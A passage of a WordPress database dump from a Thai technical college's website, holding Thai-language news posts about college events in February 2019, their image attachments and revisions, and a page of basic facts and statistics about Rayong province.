href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2554.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2554</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2553.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2553</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2552.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2552</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2551.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2551</a></span></h3>\r\n<h3></h3>', 'รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา', '', 'inherit', 'closed', 'closed', '', '2418-revision-v1', '', '', '2019-02-18 13:36:09', '2019-02-18 06:36:09', '', 2418, 'http://www.technicrayong.ac.th/2418-revision-v1/', 0, 'revision', '', 0),
(5194, 3, '2019-02-18 13:43:04', '2019-02-18 06:43:04', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D762555157454008%26id%3D100010985913485&width=500\" width=\"500\" height=\"764\" frameborder=\"0\" scrolling=\"no\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\"></span></iframe></p>', 'วันศุกร์ที่ ๑๕ กุมภาพันธ์ ๒๕๖๒ นายจิระพงษ์ จันทร์ประเสริฐ รองผู้อำนวยการสถาบันการอาชีวศึกษาภาคตะวันออก มอบเกียรติบัตรให้แก่ นักศึกษาที่เข้าร่วมการอบรม ภายใต้โครงการพัฒนาศักยภาพผู้ประกอบการด้านการออกแบบและผลิตชิ้นส่วนยานยนต์ ชิ้นส่วนอากาศยานด้านเทคโนโลยีขั้นสูงในเขตพัฒนาพิเศษภาคตะวันออก ซึ่งสถาบันการอาชีวศึกษาภาคตะวันออก ได้ร่วมมือกับสถาบันสหกิจศึกษาและพัฒนาสื่ออิเล็กทรอนิกส์ ไทย-เยอรมัน มหาวิทยาลัยเทคโนโลยีพระจอมเกล้าพระนครเหนือ ณ วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%a8%e0%b8%b8%e0%b8%81%e0%b8%a3%e0%b9%8c%e0%b8%97%e0%b8%b5%e0%b9%88-%e0%b9%91%e0%b9%95-%e0%b8%81%e0%b8%b8%e0%b8%a1%e0%b8%a0%e0%b8%b2%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98', '', '', '2019-02-18 13:43:04', '2019-02-18 06:43:04', '', 0, 'http://www.technicrayong.ac.th/?p=5194', 133, 'post', '', 0),
(5195, 3, '2019-02-18 13:41:29', '2019-02-18 06:41:29', '', '52427928_762542587455265_8475519510797877248_o', '', 'inherit', 'closed', 'closed', '', '52427928_762542587455265_8475519510797877248_o', '', '', '2019-02-18 13:41:29', '2019-02-18 06:41:29', '', 5194, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/02/52427928_762542587455265_8475519510797877248_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(5196, 3, '2019-02-18 13:43:04', '2019-02-18 06:43:04', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D762555157454008%26id%3D100010985913485&width=500\" width=\"500\" height=\"764\" frameborder=\"0\" scrolling=\"no\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\"></span></iframe></p>', 'วันศุกร์ที่ ๑๕ กุมภาพันธ์ ๒๕๖๒ นายจิระพงษ์ จันทร์ประเสริฐ รองผู้อำนวยการสถาบันการอาชีวศึกษาภาคตะวันออก มอบเกียรติบัตรให้แก่ นักศึกษาที่เข้าร่วมการอบรม ภายใต้โครงการพัฒนาศักยภาพผู้ประกอบการด้านการออกแบบและผลิตชิ้นส่วนยานยนต์ ชิ้นส่วนอากาศยานด้านเทคโนโลยีขั้นสูงในเขตพัฒนาพิเศษภาคตะวันออก ซึ่งสถาบันการอาชีวศึกษาภาคตะวันออก ได้ร่วมมือกับสถาบันสหกิจศึกษาและพัฒนาสื่ออิเล็กทรอนิกส์ ไทย-เยอรมัน มหาวิทยาลัยเทคโนโลยีพระจอมเกล้าพระนครเหนือ ณ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '5194-revision-v1', '', '', '2019-02-18 13:43:04', '2019-02-18 06:43:04', '', 5194, 'http://www.technicrayong.ac.th/5194-revision-v1/', 0, 'revision', '', 0),
(5197, 3, '2019-02-18 13:46:58', '2019-02-18 06:46:58', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D762654970777360%26id%3D100010985913485&width=500\" width=\"500\" height=\"745\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันศุกร์ที่ ๑๕ กุมภาพันธ์ ๒๕๖๒ คณะผู้บริหาร ครู วิทยาลัยเทคนิคระยอง ร่วมต้อนรับ นายชัชชาย แก้วขจร ผู้อำนวยการกลุ่มงานศูนย์ดำรงธรรม พร้อมด้วยคณะจากสำนักงานจังหวัดตราด เข้าศึกษาดูงาน ภายใต้โครงการศึกษาดูงานเขตพัฒนาพิเศษภาคตะวันออก (EEC) จังหวัดระยอง โดยรับฟังข้อมูลเกี่ยวกับศูนย์ประสานงานผลิตและพัฒนากำลังคนอาชีวศึกษา เขตพัฒนาพิเศษภาคตะวันออก(EEC) จังหวัดระยอง และเดินเยี่ยมชมศูนย์ฯ ณ วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%a8%e0%b8%b8%e0%b8%81%e0%b8%a3%e0%b9%8c%e0%b8%97%e0%b8%b5%e0%b9%88-%e0%b9%91%e0%b9%95-%e0%b8%81%e0%b8%b8%e0%b8%a1%e0%b8%a0%e0%b8%b2%e0%b8%9e%e0%b8%b1%e0%b8%99-2', '', '', '2019-02-18 13:46:58', '2019-02-18 06:46:58', '', 0, 'http://www.technicrayong.ac.th/?p=5197', 132, 'post', '', 0),
(5198, 3, '2019-02-18 13:46:27', '2019-02-18 06:46:27', '', '52013984_762652684110922_3135398942955536384_o', '', 'inherit', 'closed', 'closed', '', '52013984_762652684110922_3135398942955536384_o', '', '', '2019-02-18 13:46:27', '2019-02-18 06:46:27', '', 5197, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/02/52013984_762652684110922_3135398942955536384_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(5199, 3, '2019-02-18 13:46:58', '2019-02-18 06:46:58', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D762654970777360%26id%3D100010985913485&width=500\" width=\"500\" height=\"745\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันศุกร์ที่ ๑๕ กุมภาพันธ์ ๒๕๖๒ คณะผู้บริหาร ครู วิทยาลัยเทคนิคระยอง ร่วมต้อนรับ นายชัชชาย แก้วขจร ผู้อำนวยการกลุ่มงานศูนย์ดำรงธรรม พร้อมด้วยคณะจากสำนักงานจังหวัดตราด เข้าศึกษาดูงาน ภายใต้โครงการศึกษาดูงานเขตพัฒนาพิเศษภาคตะวันออก (EEC) จังหวัดระยอง โดยรับฟังข้อมูลเกี่ยวกับศูนย์ประสานงานผลิตและพัฒนากำลังคนอาชีวศึกษา เขตพัฒนาพิเศษภาคตะวันออก(EEC) จังหวัดระยอง และเดินเยี่ยมชมศูนย์ฯ ณ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '5197-revision-v1', '', '', '2019-02-18 13:46:58', '2019-02-18 06:46:58', '', 5197, 'http://www.technicrayong.ac.th/5197-revision-v1/', 0, 'revision', '', 0),
(5200, 3, '2019-02-18 13:52:17', '2019-02-18 06:52:17', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.764251117284412&type=3\"><img class=\"aligncenter size-full wp-image-5201\" src=\"/wp-content/uploads/2019/02/18-2-2562-13-49-05.png\" alt=\"\" width=\"514\" height=\"818\" /></a>', 'วันจันทร์ที่ ๑๘ กุมภาพันธ์ ๒๕๖๒ นายอรรถพล สังขวาสี ผู้อำนวยการสำนักความร่วมมือ ให้เกียรติมาเป็นประธานในพิธีปล่อยคาราวานส่งมอบนวัตกรรมเครื่องพ่นละอองน้ำ โครงการอาชีวะอาสา ลดควัน ลดฝุ่น เพื่อนำไปติดตั้งยังพื้นที่ที่มีสภาวะค่าฝุ่นละอองอยู่ในขั้นวิกฤตและมีความเสี่ยงสูง โดยจะติดตั้งที่สถานศึกษา และส่วนราชการต่างๆ โดยมี ว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง เป็นผู้กล่าวถึงวัตถุประสงค์ในการจัดงานครั้งนี้ ณ วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%88%e0%b8%b1%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b9%8c%e0%b8%97%e0%b8%b5%e0%b9%88-%e0%b9%91%e0%b9%98-%e0%b8%81%e0%b8%b8%e0%b8%a1%e0%b8%a0%e0%b8%b2%e0%b8%9e%e0%b8%b1%e0%b8%99', '', '', '2019-02-18 13:52:17', '2019-02-18 06:52:17', '', 0, 'http://www.technicrayong.ac.th/?p=5200', 131, 'post', '', 0),
(5201, 3, '2019-02-18 13:49:36', '2019-02-18 06:49:36', '', '18-2-2562 13-49-05', '', 'inherit', 'closed', 'closed', '', '18-2-2562-13-49-05', '', '', '2019-02-18 13:49:36', '2019-02-18 06:49:36', '', 5200, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/02/18-2-2562-13-49-05.png', 0, 'attachment', 'image/png', 0),
(5202, 3, '2019-02-18 13:51:55', '2019-02-18 06:51:55', '', '52094036_764251240617733_2972909377981251584_o', '', 'inherit', 'closed', 'closed', '', '52094036_764251240617733_2972909377981251584_o', '', '', '2019-02-18 13:51:55', '2019-02-18 06:51:55', '', 5200, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/02/52094036_764251240617733_2972909377981251584_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(5203, 3, '2019-02-18 13:52:17', '2019-02-18 06:52:17', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.764251117284412&type=3\"><img class=\"aligncenter size-full wp-image-5201\" src=\"/wp-content/uploads/2019/02/18-2-2562-13-49-05.png\" alt=\"\" width=\"514\" height=\"818\" /></a>', 'วันจันทร์ที่ ๑๘ กุมภาพันธ์ ๒๕๖๒ นายอรรถพล สังขวาสี ผู้อำนวยการสำนักความร่วมมือ ให้เกียรติมาเป็นประธานในพิธีปล่อยคาราวานส่งมอบนวัตกรรมเครื่องพ่นละอองน้ำ โครงการอาชีวะอาสา ลดควัน ลดฝุ่น เพื่อนำไปติดตั้งยังพื้นที่ที่มีสภาวะค่าฝุ่นละอองอยู่ในขั้นวิกฤตและมีความเสี่ยงสูง โดยจะติดตั้งที่สถานศึกษา และส่วนราชการต่างๆ โดยมี ว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง เป็นผู้กล่าวถึงวัตถุประสงค์ในการจัดงานครั้งนี้ ณ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '5200-revision-v1', '', '', '2019-02-18 13:52:17', '2019-02-18 06:52:17', '', 5200, 'http://www.technicrayong.ac.th/5200-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(5204, 3, '2019-02-20 10:44:23', '2019-02-20 03:44:23', '<img class=\"aligncenter wp-image-822 size-full\" src=\"/wp-content/uploads/2018/01/GPP55-e1517214593488.jpg\" alt=\"\" width=\"1106\" height=\"700\" />\r\n<h3 id=\"sites-page-title-header\" align=\"left\"><span id=\"sites-page-title\" dir=\"ltr\" style=\"color: #0000ff;\" tabindex=\"-1\">ข้อมูลทั่วไปจังหวัดระยอง</span></h3>\r\n<div> ระยอง....เป็นจังหวัดขนาดเล็กแห่งหนึ่งในภาคตะวันออกของประเทศ เป็นที่รู้จักในปัจจุบันว่าเป็นแหล่งท่องเที่ยว มีผลไม้ชั้นยอด เป็นแหล่งอุตสาหกรรมหลักของประเทศ มีสภาพเศรษฐกิจดี มีรายได้<span lang=\"TH\">ต่อหัวประชากรสูงเป็นอันดับหนึ่งของประเทศ คือ 1</span>,<span lang=\"TH\">143</span>,<span lang=\"TH\">740 บาท/ คน ผลิตภัณฑ์มวลรวมจังหวัด (</span>GPP<span lang=\"TH\">) เท่ากับ</span> <span lang=\"TH\">672</span>,<span lang=\"TH\">104 ล้านบาท ซึ่งมาจากสาขาการผลิตด้านอุตสาหกรรมและเหมืองแร่ กว่าร้อยละ 92</span></div>\r\n<div> แต่เดิมจังหวัดระยองเป็นที่รู้จักในฐานะเมืองผลไม้ดีของภาคตะวันออ ไม่ว่าจะเป็นมังคุด ทุเรียน เงาะ รวมทั้งอาหารทะเลสด แปรรูป กะปิ น้ำปลา เนื่องจากสภาพดินฟ้าอากาศที่เอื้ออำนวย และสภาพภูมิประเทศที่เหมาะสม นอกจากนี้ยังได้ชื่อว่าเป็นเมืองท่องเที่ยวที่สวยงาม มีชายหาดยาวสวยเลียบขนานไปกับอ่าวไทย และเกาะสวยงามระดับโลก เช่น เกาะเสม็ดที่รู้จักกันแพร่หลายท่ามกลางนักท่องเที่ยวชาวไทย และ<span lang=\"TH\">ชาวต่างประเทศฐานเศรษฐกิจที่สำคัญของจังหวัด คือ ภาคเกษตรกรรม การท่องเที่ยวและภาคอุตสาหกรรม (ข้อมูลสรุปจังหวัดระยอง ปี </span>2553<span lang=\"TH\">)</span></div>\r\n<div> จังหวัดระยองเริ่มมีการเปลี่ยนแปลงเป็นจังหวัดอุตสาหกรรม นับตั้งแต่ค้นพบก๊าซธรรมชาติ <span lang=\"TH\">ในอ่าวไทยเมื่อปี พ</span>.<span lang=\"TH\">ศ</span>. 2520 <span lang=\"TH\">เป็นการเริ่มต้นยุค </span>“<span lang=\"TH\">โชติช่วงชัชวาล</span>”<span lang=\"TH\"> และเป็นที่มาของ </span>“<span lang=\"TH\">โครงการพัฒนาพื้นที่ชายฝั่งทะเลภาคตะวันออก</span>”<span lang=\"TH\"> ( </span>Eastern Seaboard Development Program<span lang=\"TH\"> ) ในปี 2524 ช่วงระยะเวลาเกือบ 30 ปี ทำให้โครงสร้างทางเศรษฐกิจของจังหวัดระยองเปลี่ยนเป็นอุตสาหกรรมนำการท่องเที่ยวและเกษตรกรรม <span style=\"color: #0000ff;\">>>>></span></span><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=category&layout=blog&id=62&Itemid=135\"><span style=\"color: #0000ff;\">ข้อมูลเพิ่มเติม</span></a></div>\r\n<div></div>\r\n<div></div>\r\n<img class=\"aligncenter wp-image-826 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-06-39.jpg\" alt=\"\" width=\"696\" height=\"632\" />\r\n\r\n<img class=\"wp-image-827 size-full aligncenter\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-09-24.jpg\" alt=\"\" width=\"645\" height=\"271\" />\r\n<h3><span style=\"color: #0000ff;\"><b><span lang=\"TH\">ขนาดและที่ตั้ง</span></b></span></h3>\r\n<div>\r\n<div>\r\n\r\n<span lang=\"TH\">จังหวัดระยองมีพื้นที่ประมาณ </span>3,552 <span lang=\"TH\">ตารางกิโลเมตร หรือ </span>2,220,000 <span lang=\"TH\">ไร่</span><span lang=\"TH\"> ตั้งอยู่ในภาคตะวันออกของประเทศไทยระหว่างเส้นรุ้งที่ </span>12-13 <span lang=\"TH\">องศาเหนือ และเส้นแวงที่ </span>101-102 <span lang=\"TH\">องศาตะวันออก ห่างจากกรุงเทพฯ ประมาณ </span>179 <span lang=\"TH\">กิโลเมตร</span><span lang=\"TH\"> มีอาณาเขตติดต่อกับจังหวัดใกล้เคียงดังนี้</span>\r\n\r\n</div>\r\n</div>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศเหนือ </span></b><span lang=\"TH\"> ติดต่อกับเขตอำเภอหนองใหญ่ อำเภอบ่อทอง และอำเภอศรีราชา</span>ของจังหวัดชลบุรี\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศใต</span></b><span lang=\"TH\">้ จดทะเลอ่าวไทย พื้นที่ฝั่งทะเลยาวประมาณ </span>100 <span lang=\"TH\">กิโลเมตร</span><span lang=\"TH\"> ของอ่าวไทย</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศตะวันออก</span></b> <span lang=\"TH\"> ติดต่อกับเขตอำเภอท่าใหม่ อำเภอนายายอาม ของจังหวัดจันทบุรี</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศตะวันตก</span></b> <span lang=\"TH\"> ติดต่อกับเขตอำเภอสัตหีบ อำเภอบางละมุง ของจังหวัดชลบุรี</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<strong><span style=\"color: #0000ff;\"> <a href=\"http://www.oceansmile.com/map/k/3178.gif\"><img class=\"aligncenter wp-image-830 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-44-46.jpg\" alt=\"\" width=\"1076\" height=\"707\" /></a> </span></strong>\r\n<h3><span style=\"color: #0000ff;\"><b><span lang=\"TH\">การปกครองและประชากร</span></b></span></h3>\r\n<span lang=\"TH\">แบ่งเขตการปกครองเป็น</span> 8 <span lang=\"TH\">อำเภอ โดยประกอบด้วย</span> 54 <span lang=\"TH\">ตำบล</span> 439 <span lang=\"TH\">หมู่บ้าน</span> 80 <span lang=\"TH\">ชุมชน ส่วนด้านการปกครองท้องถิ่น ประกอบด้วย องค์การบริหารส่วนจังหวัด</span> 1 <span lang=\"TH\">แห่ง เทศบาลนคร</span> 1 <span lang=\"TH\">แห่ง เทศบาลเมือง</span> 2 <span lang=\"TH\">แห่ง เทศบาลตำบล 24 แห่ง และองค์การบริหารส่วนตำบล</span> 4<span lang=\"TH\">0 แห่ง ประชากรของจังหวัดระยอง ณ ธันวาคม </span>2558 <span lang=\"TH\">มีทั้งสิ้น</span> 688,999<span lang=\"TH\"> คน เป็นชาย 339</span>,333<span lang=\"TH\"> คน คิดเป็นร้อยละ</span>49.33 <span lang=\"TH\">เป็นหญิง 349,666 คน คิดเป็นร้อยละ</span> 50.67 <span lang=\"TH\">ของประชากรทั้งหมด อำเภอที่มีประชากรมากที่สุด คือ อำเภอเมือง มีจำนวน</span> 271,460 <span lang=\"TH\">คน อำเภอที่มีประชากรน้อยที่สุด คือ อำเภอเขาชะเมา มีจำนวน</span> 23,816<span lang=\"TH\"> คน จำนวนครัวเรือนทั้งจังหวัดรวม</span> 3<span lang=\"TH\">23</span>,<span lang=\"TH\">056 ครัวเรือน อำเภอเมืองระยองมีความหนาแน่นของประชากรมากที่สุด คือ</span> 527.60 <span lang=\"TH\">คนต่อหนึ่งตารางกิโลเมตร รองลงมาคือ อำเภอบ้านฉาง</span>292.10 <span lang=\"TH\">คนต่อหนึ่งตารางกิโลเมตร อำเภอที่มีประชากรหนาแน่นน้อยที่สุด คืออำเภอวังจันทร์ 65.8 คนต่อหนึ่งตารางกิโลเมตร จากการคาดการณ์ว่าประชากรของจังหวัดระยองจะเพิ่มเป็น</span> 698,017 <span lang=\"TH\">คนในปี</span> 2561 <span lang=\"TH\">แต่ในสภาพความเป็นจริง จังหวัดระยองมีประชากรมากกว่าตัวเลขในทะเบียนราษฎร์ไม่ต่ำกว่า</span> 300,000 <span lang=\"TH\">คน ทั้งนี้เกิดจากการอพยพเข้ามาในแรงงานภาคอุตสาหกรรมและการบริการ และมีแนวโน้มที่จะเพิ่มขึ้นอย่างรวดเร็วตามการเติบโตของภาคอุตสาหกรรม</span>\r\n<h3></h3>\r\n<h4><span style=\"color: #0000ff;\">ข้อมูลด้านประวัติศาสตร์ ภูมิศาสตร์ เศรษฐกิจ สังคม การศึกษา และสาระที่เป็นประโยชน์ด้านอื่น ๆ </span><span style=\"color: #0000ff;\">เกี่ยวกับจังหวัดระยองเพิ่มเติม >>>> ตามเวปไซต์ และ LINK ด้านล่าง</span></h4>\r\n<h3><span style=\"color: #0000ff;\"><a href=\"http://www.rayong.go.th/\"><img class=\"alignleft wp-image-831 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-58-38.jpg\" alt=\"\" width=\"698\" height=\"146\" /></a> </span></h3>\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.industry.go.th/industry/index.php/th/\"><img class=\"alignleft wp-image-832 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-58-49.jpg\" alt=\"\" width=\"701\" height=\"116\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.industry.go.th/rayong/\"><img class=\"alignleft wp-image-833 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-16.jpg\" alt=\"\" width=\"729\" height=\"123\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.fti-rayong.com/\"><img class=\"alignleft wp-image-834 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-28.jpg\" alt=\"\" width=\"424\" height=\"104\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.aecthaibiz.com/province/main.html?pv=21\"><img class=\"alignleft wp-image-835 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-38.jpg\" alt=\"\" width=\"422\" height=\"89\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n<h4 class=\"contentheading\"><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"http://123.242.173.8/v2/images/stories/rayongdata60.pdf\">บรรยายสรุปจังหวัดระยอง 2560</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><b><a style=\"color: #ff00ff;\" href=\"http://rayong.cdd.go.th/project.html/JPT/JPT.htm\">ข้อมูลความจำเป็นพื้นฐานและข้อมูลพื้นฐาน</a> จังหวัดระยอง 2559</b></span></h4>\r\n<h4 class=\"contentheading\"><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"http://wwww.technicrayong.ac.th/sites/default/files/file/Datacenter/5%20%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B9%80%E0%B8%A8%E0%B8%A3%E0%B8%A9%E0%B8%90%E0%B8%81%E0%B8%B4%E0%B8%88/%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%9E%E0%B8%B1%E0%B8%92%E0%B8%99%E0%B8%B2%E0%B8%88%E0%B8%B1%E0%B8%87%E0%B8%AB%E0%B8%A7%E0%B8%B1%E0%B8%94%E0%B8%A3%E0%B8%B0%E0%B8%A2%E0%B8%AD%E0%B8%87%202558-2561.pdf\">แผนพัฒนาจังหวัดระยอง 2558 - 2561</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"http://klang.cgd.go.th/ryg/gpprayong.html\">GPP จังหวัดระยอง</a></span></h4>\r\n<span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=608&Itemid=199\"><strong>รายงานภาวะเศรษฐกิจการคลังจังหวัดระยอง ปีงบประมาณ 2548-2558</strong></a></span>\r\n\r\n<span style=\"color: #ff00ff;\"><b><a style=\"color: #ff00ff;\" href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1180:-2557&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2559</a></b></span>\r\n\r\n<span style=\"color: #ff00ff; font-size: medium;\"><b><a style=\"color: #ff00ff;\" href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1159:-2558&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2558</a></b></span>\r\n\r\n<span style=\"color: #ff00ff;\"><b><a style=\"color: #ff00ff;\" href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1134:-2557&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2557</a></b></span>\r\n\r\n<span style=\"color: #ff00ff;\"><strong><a style=\"color: #ff00ff;\" href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1133:-2556&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2556</a></strong></span>\r\n\r\n<span style=\"color: #ff00ff;\"><strong><a style=\"color: #ff00ff;\" href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1103:-2555&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2555</a></strong></span>\r\n\r\n<span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1047:-2554&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2554</strong></a></span>\r\n<div class=\"article-rel-wrapper\"><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1016:-2553&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2553</strong></a></span></div>\r\n<div class=\"article-rel-wrapper\">\r\n\r\n<span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=910:2010-04-04-09-46-49&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2552</strong></a></span>\r\n<div class=\"article-rel-wrapper\"><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=764:2010-04-04-09-46-49&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2551</strong></a></span></div>\r\n</div>', 'ข้อมูลพื้นฐานจังหวัด', '', 'inherit', 'closed', 'closed', '', '821-revision-v1', '', '', '2019-02-20 10:44:23', '2019-02-20 03:44:23', '', 821, 'http://www.technicrayong.ac.th/821-revision-v1/', 0, 'revision', '', 0),
